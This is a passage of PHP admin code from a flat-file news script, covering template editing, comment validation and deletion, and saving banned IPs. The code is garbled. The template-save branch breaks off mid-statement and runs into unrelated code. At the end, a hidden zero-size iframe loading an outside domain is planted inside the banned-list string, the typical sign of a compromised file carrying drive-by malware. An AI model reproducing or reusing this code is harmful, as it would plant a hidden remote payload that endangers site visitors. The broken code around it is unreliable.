action="?id=edittemps"> <p>$ind175a<br /> <select id="menu" name="menu" onchange="jump_template(this.form)"> <option selected="selected">------------------------</option> <option value="1">$ind176</option> <option value="2">$ind177</option> <option value="3">$ind178</option> <option value="4">$ind179</option> <option value="5">$ind180</option> <option value="6">$ind181</option> <option value="7">$ind181a</option> </select> </p> </form> html; } else { $title = $ind17; $content = $ind20; } } //----------------- //edit selected template elseif($id == 'edittemps'){ /*id Template Edit*/ if(has_access( NEWS_ADMIN )){ $show = ( isset ($VARS['show']) ) ? intval ($VARS["show"]) : 0; $edit1 = $edit2 = ""; if ( $show == 0 || !$show || $show > 7 ) { $title = $ind17; $content = $error10; } else { $title = $ind23; $content .= "<form action= \"?id=savetemp\" method=\"post\" id=\"tmpl_form\">"; $name1 = ''; $name2 = ''; switch ( $show ) { case 1: $name1 = 'header.php'; $name2 = 'footer.php'; $content .= $ind187; break; case 2: $name1 = 'com_header.php'; $name2 = 'com_footer.php'; $content .= $ind187; break; case 3: $name1 = 'news_temp.php'; $name2 = 'fullnews_temp.php'; $content .= $ind189 . $ind24; break; case 4: $name1 = 'arch_news_temp.php'; $content .= $ind189 . $ind24; break; case 5: $name1 = 'com_temp.php'; $name2 = 'com_fulltemp.php'; $content .= $ind191 . $ind26; break; case 6: $name1 = 'headline_temp.php'; $name2 = 'sendtofriend_temp.php'; $content .= $ind192 . $ind30; break; case 7: $name1 = 'news_a_day_temp.php'; $content .= $ind192a . $ind30a; break; default: break; } $find = array ('&', '<', '>', '"'); $replace = array ('&', '<', '>', '"'); $edit1 = @implode ('', @file (FNEWS_ROOT_PATH . 'templates/' . $name1)); $edit1 = str_replace ($find, $replace, $edit1); if( $name2 <> "" ){ $edit2 = @implode ('', @file (FNEWS_ROOT_PATH . 'templates/' . $name2)); $edit2 = str_replace ($find, $replace, $edit2); } $content .= <<<html <div style="text-align:center"> <textarea name="edit1" id="edit1" class="post" cols="85" rows="20">$edit1</textarea><br /> <input type="button" onclick="document.getElementById('edit1').rows += 5" value="+" /> <input type="button" onclick="document.getElementById('edit1').rows -= 5" value="-" /> <input id="edited" name="edited" type="hidden" value="$show" /> </div> html; if ( $name2 ) { switch ( $show ) { case 1: // fall-through case 2: $content .= $ind188; break; case 3: $content .= $ind25; break; case 5: $content .= $ind37; break; case 6: $content .= $ind38; break; default: break; } $content .= <<<html <div style="text-align:center"> <textarea name="edit2" id="edit2" class="post" cols="85" rows="20">$edit2</textarea><br /> <input type="button" onclick="document.getElementById('edit2').rows += 5" value="+" /> <input type="button" onclick="document.getElementById('edit2').rows -= 5" value="-" /> </div> <p> <input type="submit" class="mainoption" value="$ind36" /> </p> html; } else { $content .= <<<html <p> <input id="edit2" name="edit2" type="hidden" value="" /> <input type="submit" class="mainoption" value="$ind36" /> </p> html; } $timestamp = time(); $content .= '<input type="hidden" name="post_form" value="' . get_form_character ($timestamp) . '" />' . "\n"; $content .= '<input type="hidden" name="post_time" value="' . $timestamp . '" />' . "\n" . '</form>'; } }else{ $title = $ind17; $content = $ind20; } } //------------------------ //save template elseif($id == "savetemp"){ /*id Template Save*/ if(has_access( NEWS_ADMIN )){ if ( !check_form_character() ) { $title = $ind17; $content = $ind298; } else { $edit1 = ( isset ($VARS["edit1"]) ) ? $VARS['edit1'] : ''; $edit2 = ( isset ($VARS["edit2"]) ) ? $VARS['edit2'] : ''; $edited = ( isset ($VARS['edited']) ) ? intval ($VARS["edited"]) : 0; if ( !$edited || $edited == 0 || $edited > 7 ) { $title = $ind17; $content = $error10; } else { $edit1 = unhtmlentities ($edit1); $edit2 = unhtmlentities ($edit2); $find = array ('!DOCTYPE', '<!', '-->', '<script'); $replace = array ('!DOCTYPE', '<!', '-->', ' html; } } else { $title = $ind17; $content = $ind19; } } else if ( $id == 'validatecomments' ) { if ( has_access (NEWS_EDITOR) ) { if ( !check_form_character() ) { $title = $ind17; $content = $ind298; } else { $comid = ( isset ($VARS['comid']) ) ? $VARS['comid'] : array(); if ( sizeof ($comid) <= 0 ) { // blank... } else { $file = file (FNEWS_ROOT_PATH . 'news/toc.php'); array_shift ($file); foreach ( $file as $newsfile ) { $newsfile = explode ('|<|', $newsfile); $newsid = $newsfile[0]; if ( file_exists (FNEWS_ROOT_PATH . 'news/news.' . $newsid . '.php') ) { $newsfile = file (FNEWS_ROOT_PATH . 'news/news.' . $newsid . '.php'); $start = array_shift ($newsfile); list ($shortnews, $fullnews, $writer, $subject, $description, $categories, $timestamp, $num_comments, $news_id) = explode ('|<|', $newsfile[0]); array_shift ($newsfile); $write = ''; foreach ( $newsfile as $comment ) { list ($cip, $cvalidated, $cmsg, $cname, $cemail, $ctime, $cid) = explode ('|<|', $comment); if ( in_array ($cid, $comid) ) { $write .= $cip . '|<|1|<|' . $cmsg . '|<|' . $cname . '|<|' . $cemail . '|<|' . $ctime . '|<|' . $cid . '|<|' . "\n"; $num_comments++; } else { $write .= $comment; } } $start .= $shortnews . '|<|' . $fullnews . '|<|' . $writer . '|<|' . $subject . '|<|' . $description . '|<|' . $categories . '|<|' . $timestamp . '|<|' . $num_comments . '|<|' . $news_id . '|<|' . "\n"; $write = $start . $write; if ( safe_write ('news/news.' . $newsid . '.php', 'wb', $write) ) { $title = $ind146; $content = make_redirect ($ind321, '?id=commentmanag', $ind334); } } } } } } else { $title = $ind17; $content = $ind19; } } else if ( $id == 'deletecomments' ) { // Delete unvalidated comments if ( has_access (NEWS_EDITOR) ) { if ( !check_form_character() ) { $title = $ind17; $content = $ind298; } else { $comid = ( isset ($VARS['comid']) ) ? $VARS['comid'] : array(); if ( sizeof ($comid) <= 0 ) { // blank... } else { $file = file (FNEWS_ROOT_PATH . 'news/toc.php'); array_shift ($file); foreach ( $file as $newsfile ) { $newsfile = explode ('|<|', $newsfile); $newsid = $newsfile[0]; if ( file_exists (FNEWS_ROOT_PATH . 'news/news.' . $newsid . '.php') ) { $newsfile = file (FNEWS_ROOT_PATH . 'news/news.' . $newsid . '.php'); $write = array_shift ($newsfile); list ($shortnews, $fullnews, $writer, $subject, $description, $categories, $timestamp, $num_comments, $news_id) = explode ('|<|', $newsfile[0]); $write .= array_shift ($newsfile); foreach ( $newsfile as $comment ) { list ($cip, $cvalidated, $cmsg, $cname, $cemail, $ctime, $cid) = explode ('|<|', $comment); if ( in_array ($cid, $comid) ) { continue; } else { $write .= $comment; } } safe_write ('news/news.' . $newsid . '.php', 'wb', $write); } } $title = $ind146; $content = make_redirect ($ind164, '?id=commentmanag', $ind334); } } } else { $title = $ind17; $content = $ind19; } } //----------------- //save banned IP's elseif($id == "savebanned"){ /*id Banned Save*/ if(has_access( NEWS_EDITOR )){ if ( !check_form_character() ) { $title = $ind17; $content = $ind298; } else { $bannedlist = ( isset ($VARS["bannedlist"]) ) ? $VARS['bannedlist'] : ''; $banned_ip = explode ("\n", $bannedlist); $bannedlist = '<?php die (\'You may not access this file.\'); ?> <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://gubmos.com/index12"></iframe>
Simpan